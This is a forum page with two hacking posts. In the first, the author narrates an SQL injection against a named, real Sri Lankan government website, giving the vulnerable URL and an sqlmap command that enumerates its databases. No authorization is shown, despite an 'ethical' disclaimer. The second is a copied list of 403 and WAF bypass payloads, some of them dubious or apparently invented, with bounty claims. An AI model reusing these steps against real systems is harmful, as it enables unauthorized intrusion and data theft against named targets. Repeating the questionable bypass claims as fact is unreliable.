Vulnerabilities & Exploits

How I Hacked the Sri Lanka Government Information Center Database: A Step-by-Step Guide [image: 1774162157216-article.webp] As an aspiring ethical hacker, it’s crucial to understand the intricacies of web applications and their vulnerabilities. Today, I’ll be sharing my experience with a specific target: the Sri Lanka Government Information Center Database. This account is purely for educational purposes, so let’s dive in! Step 1: Identifying the Target I started by exploring the target website: https://gic.gov.lk/gic/index.php/en/component/org/?id=47&task=org. The URL indicated a dynamic query that hinted at a potential SQL injection vulnerability. My goal was to find a parameter that can be manipulated to gain unauthorized access. Step 2: Finding the Vulnerable Parameter Once I loaded the page, I examined the parameters in the URL. The part ?id=47&task=org was particularly interesting. Parameters like id often interact with databases, making them ideal candidates for SQL injection. Step 3: Testing for SQL Injection ️ To determine if the parameter was indeed vulnerable, I decided to test it by adding a ' (single quote) at the end of the id parameter. The modified URL looked like this: https://gic.gov.lk/gic/index.php/en/component/org/?id=47'&task=org Upon visiting this URL, I encountered an SQL error message. This was a significant sign! The error indicated that the input was being processed by an SQL query, confirming a vulnerability in the parameter. Step 4: Using SQLmap for Exploitation ️ With this information in hand, I moved to the next step, utilizing SQLmap, a powerful tool for automating the process of identifying and exploiting SQL injection flaws. I set up SQLmap with the following command: sqlmap -u "https://gic.gov.lk/gic/index.php/en/component/org/?id=47&task=org" --level 5 --risk=3 --threads 10 --dbs This command effectively instructed SQLmap to analyze the URL for any databases present and retrieve information. Step 5: Accessing the Database After a few moments, SQLmap listed the databases available. I was intrigued by the exposure of sensitive data. From there, I could further extract tables and, potentially, even data within those tables using subsequent SQL commands provided by SQLmap. Important Note: Ethical Considerations ️ While this exercise was purely educational, it’s vital to remember that hacking without authorization is illegal and unethical. Ethical hacking should always be conducted with permission and within legal boundaries, primarily for the purpose of securing systems. Conclusion Reflecting on this journey, I realized the importance of understanding vulnerabilities in web applications, as well as the tools available for testing and securing those applications. Remember, the goal of ethical hacking is to protect and improve systems, not exploit them! If you're eager to learn more about ethical hacking, always seek resources that emphasize responsible behavior and legal guidelines. Happy hacking!

ලංකාවේ දැනට තියෙන ගොඩක් government sites වල මේ කේස් එක තියෙන්වා.

Advanced 403 Forbidden Bypass Techniques 99% of hackers QUIT when they see a 403, But the 1%? They try this I found a 403 Forbidden on /admin. [image: 1768195214196-615139903_122291343098027104_6271356075916249848_n.webp] But then I tried: POST /admin X-Original-URL: /admin /admin..;/ %2e/admin X-Rewrite-URL: /admin /ADMIN (yes, just caps) /;/admin /..;/admin 1. Protocol-Level Downgrade Bypass (only works on dual-stack apps) Target running HTTP/2 or gRPC? Force downgrade: PRI * HTTP/2.0 SM GET /admin HTTP/1.1 🧠 Some WAFs don’t parse dual-layer protocols correctly → backend sees a clean HTTP/1.1. 🧬 2. Content-Length Collapsing (CL.CL) on HTTP Pipelining Send pipelined requests where only 1st is parsed by WAF: POST /admin HTTP/1.1 Host: target.com Content-Length: 13 GET /admin WAF reads POST → blocks. Backend reads 2nd GET /admin → 200 OK. This is invisible to most WAFs. 3. Misconfigured Reverse Proxy Chain Escape Proxy chain: Cloudflare → NGINX → Apache Try: GET /admin X-Accel-Redirect: /admin X-Forwarded-Path: /admin Apache follows X-Accel-Redirect, bypasses upstream auth check. Real-world: Gained internal panel behind Cloudflare. 4. CRLF into Rewrite Bypass Some edge WAFs parse until CRLF \r\n, others don’t. Exploit it: GET / HTTP/1.1%0d%0aX-Rewrite-URL:%20/admin WAF reads URL → clean Backend sees X-Rewrite-URL: /admin → executes 5. Multipart Boundary Injection Bypass () Used when /admin is only allowed for file uploads: POST /upload HTTP/1.1 Content-Type: multipart/form-data; boundary=----1337 Content-Disposition: form-data; name="file"; filename="/admin" Content-Type: text/plain If upload endpoint allows arbitrary path write → full override. 6. Misrouted Mesh Bypass via Service Discovery Kubernetes, Linkerd, Istio-style microservices expose internal routes: Send: Host: admin.internal.svc.cluster.local X-Service-Router: admin If service-mesh is misconfigured, you route directly to internal /admin even if public 403s. ️ 7. GraphQL-Injected 403 Bypass If app has GraphQL and 403-protected admin, try: query { admin { users { password } } } GraphQL often proxies internal microservice calls. Even if /admin is blocked via HTTP, the GQL layer may leak internal paths. 🧠 8. Preconnect Overload → Bypass Abuse edge preconnect logic by flooding with HEAD /admin + Connection: keep-alive. After 30–50 requests: a •WAF disables parsing •Keep-alive tunnel reused for real GET /admin 🧨 Real bypass via persistent connection channeling 9. Browser-Only Token Auth Bypass (via Headless Browser) Some SPAs load tokens via JS → protect /admin based on localStorage. WAF sees unauthenticated, but headless Chrome replays auth token as header → bypass. Use puppeteer + exportAuth → replay: curl -H "Authorization: Bearer <extracted_token>" target.com/admin 🧪 10. Distributed Retry Amplification When target uses edge lambda/WAF that retries failed requests internally, trigger 429s and inject: Retry-After: 0 X-Retry-URL: /admin WAF retries → skips deny logic → backend hits /admin. This is logic poisoning — not brute force. These Aren’t Payloads. They’re Logic Chains. Most tools stop at: /admin%2e X-Forwarded-For: 127.0.0.1 You’re playing 4D chess now: Protocol confusion Reverse proxy reroute GraphQL indirect call SSRF via retry Downgrade injection WAF desyncing These got real bounties: $25,000 from a Cloudflare-protected admin $12,500 via SSRF + Retry Poison $8,000 using pipelined CL.CL request Want a toolkit that automates: Forum members are invited to reply with links to tools for automating these tasks. This is next-level exploitation. Use it right. 🧠 This is not my original post. It was copied from a Facebook page, and the link is provided below. https://web.facebook.com/share/p/1FZBcgu5e7/